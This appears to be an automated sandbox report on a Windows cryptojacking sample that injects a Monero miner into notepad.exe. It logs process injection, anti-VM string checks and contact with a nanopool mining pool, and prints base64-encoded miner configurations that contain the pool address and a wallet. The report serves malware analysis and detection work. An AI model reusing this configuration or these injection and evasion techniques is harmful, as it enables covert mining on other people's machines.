                        Source: cfg.16.drBinary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==
                        Source: cfgi.16.drBinary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==
                        Source: 4rC1bQcnl5.exeBinary or memory string: o5Q/JuhlHzyiu5xNZSs8oomwX2liOqCB\7PnwoJnYRf0LPoeh5vgGEWSu580GXNQuEHQZxGPS4AyMnuXQtx+M7LxYQaxBjTcO6kyJ23UvuQrc2vo9z7g4ozLJYvhFYKNW3sGRpb\7hstAbPRfbrItzKyFTW5/eV/YDtTBUJkwrzgQUJQMHueS9VmciiY13MpGN/yCPRKcRZumiyBEG20FLO+Prwa/bEeJUozeplMORvyDT\74JNK1D07QSd3sAPSySBD
                        Source: svchost.exe, 00000005.00000002.497443323.0000015D39A4A000.00000004.00000001.sdmp, notepad.exe, 00000012.00000002.495903859.0000020F8D9C8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                        Source: svchost.exe, 00000007.00000002.494099059.000002551DC02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.326220706.00000000031C1000.00000004.00000001.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                        Source: notepad.exe, 00000012.00000002.495903859.0000020F8D9C8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW -
                        Source: svchost.exe, 00000004.00000002.259041604.0000023928F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.497106058.000001C8D5340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.303376421.000001CE95B40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.320578593.0000024E88AB0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                        Source: svchost.exe, 00000004.00000002.259041604.0000023928F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.497106058.000001C8D5340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.303376421.000001CE95B40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.320578593.0000024E88AB0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                        Source: 4rC1bQcnl5.exeBinary or memory string: JI/VeLlt9QHyBDUyEvAeR9f/w5uKT9kRIwabc64Oej/eIR8xRp6z9JLNqa/7RKO94cjV2+ahqeMUCzIE5vCtMjNMHeUe8qh5hS\7kYSPf4rQpMdeDbMbAWLvL2pcL2cqjsvqhe9B/2iiFQyklwB/DIhC9I0SN5xBbz/943HsXHJ9OP3Co1/KVFNGRLu+YSBF8VssbJlvA\71tDNVksfLiDe9EPjHgv6+6CkYT0gBOKtqXLh2Nm1VK1DJexTWP9bIDu2h
                        Source: svchost.exe, 00000005.00000002.494359874.0000015D34429000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
                        Source: 4rC1bQcnl5.exeBinary or memory string: Sa/ClFiaf3NmG/bqd5yROUpeJOUUpCB9ib7rxFsPQrE5j4dHFtDrxI2\7rHRx1un/BFkKrvkoKV2JZL6XXnpjgzuRMiFXqspzzyBVEoGs4PqfT6ccmcANWi872iqwtgxlR8qe5BQcIjpxOcoYAV7+Ym4qqgADs\7hHGFsU40jYSTj1Qg5vNB9OfxSqDP7w/X3mBGv4/8DT5DfFpl8xc9Flmakt04M5TFj9gHr8C+COCwxyUhI4mfkhkbZZu0ONdmsVDK
                        Source: svchost.exe, 00000007.00000002.494245708.000002551DC28000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.494971594.000001FC47C29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: svchost.exe, 00000004.00000002.259041604.0000023928F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.497106058.000001C8D5340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.303376421.000001CE95B40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.320578593.0000024E88AB0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,FindCloseChangeNotification,FreeLibrary,16_2_004080E0
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00402E40 mov eax, dword ptr fs:[00000030h]16_2_00402E40
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exeCode function: 17_2_01462E40 mov eax, dword ptr fs:[00000030h]17_2_01462E40
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00401800 GetProcessHeap,HeapAlloc,16_2_00401800
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        System process connects to network (likely due to code injection or exploit)Show sources
                        Source: C:\Windows\notepad.exeDomain query: xmr-us-east1.nanopool.org
                        Source: C:\Windows\notepad.exeNetwork Connect: 192.99.69.170 108Jump to behavior
                        Allocates memory in foreign processesShow sources
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory allocated: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe base: 1460000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory allocated: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe base: 3A0000 protect: page read and writeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory allocated: C:\Windows\notepad.exe base: 400000 protect: page read and writeJump to behavior
                        Creates a thread in another existing process (thread injection)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeThread created: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe EIP: 1468390Jump to behavior
                        Injects a PE file into a foreign processesShow sources
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeMemory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory written: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe base: 1460000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory written: C:\Windows\notepad.exe base: 400000 value starts with: 4D5AJump to behavior
                        Modifies the context of a thread in another process (thread injection)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeThread register set: target process: 5064Jump to behavior
                        Writes to foreign memory regionsShow sources
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeMemory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeMemory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeMemory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 409000Jump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeMemory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 40C000Jump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeMemory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 5D3000Jump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeMemory written: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe base: 1191008Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory written: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe base: 1460000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory written: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe base: 3A0000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory written: C:\Windows\notepad.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory written: C:\Windows\notepad.exe base: 401000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory written: C:\Windows\notepad.exe base: 938000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory written: C:\Windows\notepad.exe base: A15000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeMemory written: C:\Windows\notepad.exe base: 2915411010Jump to behavior
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exeCode function: DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,Process32Next,CloseHandle,FreeLibrary, explorer.exe17_2_014680E0
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeProcess created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeProcess created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'Jump to behavior
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.497482317.0000000001CE0000.00000002.00000001.sdmp, oQOWFbKllEKo.exe, 00000011.00000002.495774560.0000000001860000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.497482317.0000000001CE0000.00000002.00000001.sdmp, oQOWFbKllEKo.exe, 00000011.00000002.495774560.0000000001860000.00000002.00000001.sdmpBinary or memory string: Progman
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.497482317.0000000001CE0000.00000002.00000001.sdmp, oQOWFbKllEKo.exe, 00000011.00000002.495774560.0000000001860000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.497482317.0000000001CE0000.00000002.00000001.sdmp, oQOWFbKllEKo.exe, 00000011.00000002.495774560.0000000001860000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                        Source: 4rC1bQcnl5.exe, 00000010.00000002.497482317.0000000001CE0000.00000002.00000001.sdmp, oQOWFbKllEKo.exe, 00000011.00000002.495774560.0000000001860000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Users\user\Desktop\4rC1bQcnl5.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
